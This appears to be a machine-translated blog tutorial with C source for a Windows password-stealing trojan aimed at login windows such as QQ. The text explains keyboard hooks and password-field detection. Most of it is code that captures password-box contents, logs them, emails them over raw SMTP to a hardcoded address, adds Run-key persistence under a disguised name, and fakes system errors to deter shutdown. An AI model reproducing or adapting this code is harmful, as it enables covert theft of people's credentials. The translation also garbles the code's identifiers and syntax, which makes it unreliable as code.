Implementation principle of little hacker VC

Implementation principle of little hacker VC

The implementation principle is very simple. It mainly consists of 1. hook up with the foreground application 2. Collect the required information (that is, the password.

So how can we hook up with other programs? The answer is the hook program.

The hook mechanism allows applications to intercept and process Windows messages or specific events. Similar to the DOS Interrupt Processing Mechanism, Hook is a platform (point) of Windows message processing mechanism ). The application can set a subitem to monitor a message in a specified window, And the monitored window can be created by other processes. From the hook principle, we can know that We can insert other processes as long as any hook is installed. For account theft, I think the keyboard hook and the mouse hook are very suitable. I installed the keyboard hook so that as long as someone presses the keyboard, it must first go through the processing of our program and then the process of receiving the keyboard, for details about how to install hooks, we can use the API function setwindowshookex () to install the hooks defined by an application to the hook list.

The prototype is as follows:
Hhook setwindowsex (
Int idhook, // The Hook class we use wh_keyboardhookproc lpfn, // the address of the Child Program refers to the pointer
// Actually the address of the function for processing the password. This function is also called a callback function.
Hinstance hmod, // application instance handle, that is, the hook belongs to the process. Maybe we use the DLL handle.
DWORD dwthreadid // The identifier of the Thread associated with the installed hook. If it is 0, it is used to monitor all thread associations. We select 0. I don't need to say the reason.
);

If the function is successful, return the required hook handle. If the function fails, return null.
Note that to associate a hook with all threads, you must install the hook in the DLL (the hooks are generally installed in the DLL) we can also write all the code in the DLL to ensure that when it is successfully linked to his application, even if the master program of the account theft is disabled, but he can still work normally, so he can never monitor it in the DLL. whether the main program is shut down, if you are shut down, you can call the main program or make system errors to restart the machine so that others do not close your process easily. After installing the hook, we need to consider the callback function. The general situation of the callback function is as follows:

Lresult callback hookproc (INT ncode, // hook code
Wparam, // current process flag
Lparam // address with message structure
)

In this way, the user will call the designed callback function for processing as long as he presses the keyboard. At this point, we have basically completed the hook with other programs.

Next, we need to consider how to process the collected information. We need to consider which form receives the Keyboard Command, what is the form title, and whether there is a password input box on the form.

Which form receives the Keyboard Command? You can use the API function hwnd getforegroundwindow (void );

This function returns the front-end window (the current user's window ). The system assigns a higher priority to the thread that generates the foreground window. Return Value: the handle of the foreground window returned by the function. A function is not enough to know the current form.

Int getwindowtext (
Hwnd, // a window with text or a control handle.
Lptstr lpstring, // pointer to the buffer of the received text.
Int nmaxcount // specifies the maximum number of characters to be stored in the buffer, which contains null characters. If the text exceeds the limit, it is truncated.
);

This function copies the title text (if any) of the specified window to a cache,

Note: getwindowtext cannot receive control text in other applications.

But the code behind us is to use this function to get the password. Why?

The reason is very simple. Your hook function is equivalent to a part of the code after the DLL is linked to other programs, so you can use it to obtain the password information (personal opinion)

If the function succeeds, the return value is the number of characters of the copied string. If the window does not have a title bar or text, or the title bar is empty, or the window or control handle is invalid, (The QQ login window is processed, so we won't get the characters for QQ login), then the return value is zero.

Now that you know that you can use the getwindowtext function to obtain password information, but many forms do not have password information? For example, the QQ chat window is full of text. How do I know that this form has password information ?? Besides, in addition to the password information, the QQ login window also includes QQ login: The Registration Wizard forgets the password, and so on. I need a form to determine whether there is a password.

Bool enumchildwindows (
Hwnd hwndparent, // handle of the form to be enumerated
Wndenumproc lpenumfunc, // like the callback function of the hook function, a form is searched to call the function specified by this pointer.
Lparam // parameters to be passed
);

The method is to find a subform on the specified form and call the defined callback function for processing (to determine whether it is a password box). Finally, it is to determine whether the form is a password input box.

The getwindowlong function helps us first look at the prototype
Long getwindowlong (
Hwnd, // window handle
Int nindex // specify the offset of the value to be obtained greater than or equal to 0. I do not know much about this value, but I only need to know that it is used
Gwl_style (to get the window style) is enough
);
After obtaining the window style, you can use the if statement to determine whether the window is a password.
If you have a password, you can use the getwindowtext function to get the password.
Is it easy?
Let me give you some ideas.
1 setwindowsex installation hook
2 hook function processing
3. getforegroundwindow: Get the current form.
4. getwindowtext: Get the Form title
5 enumchildwindows enumeration current form
6. Handle the enumeration form callback function. If a password is obtained using getwindowtext, the password is not followed.
7. Send email
 
The code I wrote is as follows:
Because the school basically has no time to touch the computer, some functions have not been well implemented yet, but the general outline has come out.
# Include <windows. h>
# Include <stdio. h>
# Include "ksydll. H"
# Define wm_myscoket 0x0090 // custom message
Hinstance hins; // handle of the module where the hook function is located
# Pragma data_seg ("shared") // DLL shared data segment
Hwnd keepmy = NULL; // call the dll exe handle
Char filelog [250] = ""; // name of the file for saving the password
Char filebak [250] = ""; // name of the file for saving the password
Char IP [25] = ""; // SMTP server address
Char mailto [70] = "rcpt to: <"; // SMTP command
Bool exeok = true; // determines whether the EXE is running
Bool Netlink = false; // determines whether the network is normal
# Pragma data_seg ()
# Pragma comment (linker, "/section: shared, RWS ")
Hwnd keydll = NULL; // current window
Bool yesnoto = false; // whether a password exists
Bool windowsnet = false; // determines whether the form contains a password.
Static hhook hkb = NULL;
Char pass [50] [0, 255];
Int passint;
Bool delksydll ();
Bool Reg ();
// Callback function of the hook function
Bool callback findtraywnd (hwnd, lparam );
Lresult callback keyboardproc (
Int code,
Wparam,
Lparam
)
{
Hwnd mykeyhdc;
If (DWORD) lparam & 0x40000000) & (hc_action = Code ))
{
Char szcaptions [255] = "";
Reg ();
Mykeyhdc = getforegroundwindow ();
// Determine whether the form is original
If (mykeyhdc = keydll)
{
File * FP;
Fp = fopen (filelog, "W ");
Fclose (FP );
If (windowsnet)
{
Int temp = 1;
Char szclassname [255] = "";
File * FP;
Fp = fopen (filelog, "");
Fwrite ("window name --->", strlen ("window name --->"), 1, FP );
Fwrite (szclassname, strlen (szclassname), 1, FP );
Fclose (FP );
Passint = 0;
Enumchildwindows (mykeyhdc, findtraywnd, (lparam) & temp); // enumerated form
}
}
Else // if not
{
Int temps = 2;
Windowsnet = false;
// Determine whether an email exists
If (yesnoto)
{
// Send an email
Yesnoto =! Yesnoto;
If (Netlink)
{
Netboolto (netok (2 ));
If (
Sendmessagetimeout (keepmy, wm_myscoket, null, null, smto_abortifhung, 15ung ,0) = 0)
Exeok = false;
}
Else
{
File * FP;
File * ff;
Char C;
Fp = fopen (filebak, "");
FF = fopen (filelog, "R ");
Fwrite ("The following is the information recorded by the unconnected network", sizeof ("The following is the information recorded by the unconnected network"), 1, FP );
Fputc (10, FP );
C = fgetc (ff );
While (! Feof (ff ))
{
Fputc (C, FP );
C = fgetc (ff );
}
Fclose (FP );
Fclose (ff );
}
}
// Determine the asterisk
Passint = 0;
Enumchildwindows (mykeyhdc, findtraywnd, (lparam) & temps );
If (temps = 3)
{
Windowsnet = true;
// Yesnoto = true;
Keydll = mykeyhdc;
}
}
}
If (exeok)
Return callnexthookex (hkb, code, wparam, lparam );
Else
{
// Create an error if the main program is disabled
Return (MessageBox (mykeyhdc, "serious system error/n please try restarting! "," Error ", mb_iconwarning ));
}
}
// Install the hook
Extern "C" _ declspec (dllexport) bool insthook (hwnd)
{
If (hwnd! = NULL)
Keepmy = hwnd;
If (strcmp (mailto, "rcpt to: <") = 0)
Strcat (mailto, "shunyuncc@163.com>/N ");
Int I = 0;
Char syspath [max_path];
DWORD size = max_path;
Getsystemdirectory (syspath, size );
Strcpy (filelog, syspath );
Strcat (filelog, "// keyslog.txt ");
For (I = 0; I <= (INT) strlen (filelog); I ++)
Filelog [I] = tolower (filelog [I]);
Strcpy (filebak, syspath );
Strcat (filebak, "// baklog.txt ");
For (I = 0; I <= (INT) strlen (filebak); I ++)
Filebak [I] = tolower (filebak [I]);
Hkb = setwindowshookex (wh_keyboard, (hookproc) keyboardproc, hins, 0 );
// Core statement installation hook
Return true;
}
// DLL entry function
Bool winapi dllmain (
Hinstance hinstdll,
DWORD fdwreason,
Lpvoid lpvreserved
)
{
Hins = hinstdll;
Insthook (null );
Return true;
}
// Enumeration callback function
Bool callback findtraywnd (hwnd, lparam)
{
Int * calltemp = (int *) lparam;
If (* calltemp = 1)
{
Char szclassname [255] = "";
Getwindowtext (hwnd, szclassname, 255); // obtain the text of the form.
Long lstyle = getwindowlong (hwnd, gwl_style); // obtain the window style
If (lstyle & es_password) // determines if it is a password window
If (strcmp (pass [passint], szclassname )! = 0)
{
Yesnoto = true;
Passint ++;
}
If (szclassname! = NULL)
{
File * FP;
Char temp [255];
Fp = fopen (filelog, "");
Getclassname (hwnd, temp, 255 );
If (strcmp (temp, "edit") = 0)
{If (lstyle & es_password)

Fwrite ("------------------- password input box --->", strlen ("------------------- password input box --->"), 1, FP );
Else
Fwrite ("input box --->", strlen ("input box --->"), 1, FP );
}
If (strcmp (temp, "static") = 0)
Fwrite ("prompt box --->", strlen ("prompt box --->"), 1, FP );
Fwrite (szclassname, strlen (szclassname), 1, FP );
Fputc (10, FP );
Fclose (FP );
}
}
If (* calltemp = 2)
{
Long lstyle = getwindowlong (hwnd, gwl_style );
If (lstyle & es_password)
{
// Char szclassname [255] = "";
Memset (pass [passint], 0, strlen (pass [passint]);
Getwindowtext (hwnd, pass [passint], 255 );
Passint ++;
// If (strlen (pass [passint])! = 0)
* Calltemp = 3;
}
}
Return true;
}
// Determine whether the network is connected
Extern "C" _ declspec (dllexport) void netboolto (bool netok)
{
Netlink = netok;
Return;
}
// Email Function
Extern "C" _ declspec (dllexport) bool netok (INT net)
{
Char temp [600] = "";
Struct sockaddr_in server;
Socket serverscok;
Wsadata;
Wsastartup (0x0101, & wsadata );
If (net = 1)
{
Hostent * phostent = gethostbyname ("211.215.19.90 ");
If (phostent = NULL)
Return false;
Hostent & He = * phostent;
Sockaddr_in SA;
For (INT nadapter = 0; he. h_addr_list [nadapter]; nadapter ++)
Memcpy (& SA. sin_addr.s_addr, he. h_addr_list [nadapter], he. h_length );
Memset (IP, 0, sizeof (IP ));
Strcpy (IP, inet_ntoa (SA. sin_addr ));
}
If (net = 2)
{
File * FP;
Char temps;
Server. sin_family = af_inet;
Serverscok = socket (af_inet, sock_stream, 0 );
Server. sin_port = htons (24 );
Serverscok = socket (af_inet, sock_stream, 0 );
Server. sin_addr.s_addr = inet_addr (IP );
If (connect (serverscok, (struct sockaddr *) & server, sizeof (Server
))! = 0)
{
Netboolto (false );
Return false;
}
Send (serverscok, "HELO command/R/N", strlen ("HELO command/R/N"), 0 );
Recv (serverscok, temp, 600,0 );
// MessageBox (null, temp, "password", 0 );
// Cout <temp <Endl;
Memset (temp, 0, sizeof (temp ));
Send (serverscok, "mail from:
<Hacker@shunyuncc.20cn.com>/R/N ", strlen (" mail from:
<Hacker@shunyuncc.20cn.com>/R/N "), 0 );
Recv (serverscok, temp, 600,0 );
// MessageBox (null, temp, "password", 0 );
// Cout <temp <Endl;
Memset (temp, 0, sizeof (temp ));
Send (serverscok, "rcpt to: <shunyuncc@163.com>/R/N", strlen ("rcpt:
<Shunyuncc@163.com>/R/N "), 0 );
Recv (serverscok, temp, 600,0 );
// MessageBox (null, temp, "password", 0 );
// Cout <temp <Endl;
Memset (temp, 0, sizeof (temp ));
Send (serverscok, "Data/R/N", strlen ("Data/R/N"), 0 );
Recv (serverscok, temp, 600,0 );
// MessageBox (null, temp, "password", 0 );
// Cout <temp <Endl;
Memset (temp, 0, sizeof (temp ));
Send (serverscok, "Subject: minor account theft 1.0/R/N", strlen ("Subject: minor account theft 1.0/R/N"), 0 );
Send (serverscok, "/R/N", strlen ("/R/N"), 0 );
Char hostname [256];
Gethostname (hostname, sizeof (hostname ));
Send (serverscok, "host name -->", strlen ("host name -->"), 0 );
Send (serverscok, hostname, strlen (hostname), 0 );
Send (serverscok, "/N", strlen ("/N"), 0 );
Hostent * phostent = gethostbyname (hostname );
Hostent & He = * phostent;
Sockaddr_in SA;
For (INT nadapter = 0; he. h_addr_list [nadapter]; nadapter ++)
{
Memcpy (& SA. sin_addr.s_addr, he. h_addr_list [nadapter], he. h_length );
Send (serverscok, "Host IP -->", strlen ("Host IP -->"), 0 );

Send (serverscok, inet_ntoa (SA. sin_addr), strlen (inet_ntoa (SA. sin_addr), 0 );
Send (serverscok, "/N", strlen ("/N"), 0 );
}
Fp = fopen (filebak, "");
Fclose (FP );
Fp = fopen (filebak, "R ");
Temps = fgetc (FP );
While (! Feof (FP ))
{
Send (serverscok, & temps, 1, 0 );
Temps = fgetc (FP );
}
Fclose (FP );
Fp = fopen (filebak, "W ");
Fclose (FP );
Fp = fopen (filelog, "R ");
Temps = fgetc (FP );
While (! Feof (FP ))
{
Send (serverscok, & temps, 1, 0 );
Temps = fgetc (FP );
}
Fclose (FP );
Send (serverscok, "/R/n./R/N", strlen ("/R/n./R/N"), 0 );
Send (serverscok, "Quit/R/N", strlen ("Quit/R/N"), 0 );
Recv (serverscok, temp, 600,0 );

Closesocket (serverscok );
}
Wsacleanup ();
Return true;
}
// Write the Registry Startup Function
Reg ()
{
Char syspath [max_path];
DWORD size = max_path;
Long ret;
Int I = 0;
Hkey;
DWORD type = REG_SZ;
Char fileexe [250] = "";
Lpctstr rgspath = "software // Microsoft // windows // CurrentVersion // run ";
Getsystemdirectory (syspath, size );
Strcpy (fileexe, syspath );
Strcat (fileexe, "// cssystema.exe ");
For (I = 0; I <= (INT) strlen (fileexe); I ++)
Fileexe [I] = tolower (fileexe [I]);
Ret = regopenkeyex (HKEY_LOCAL_MACHINE, rgspath, 0, key_write, & hkey );
If (Ret! = Error_success)
Regclosekey (hkey );
Ret = regsetvalueex (hkey, "qqkavqqrun", null, type, (const unsigned
Char *) fileexe, size );
Regclosekey (hkey );
Return true;
}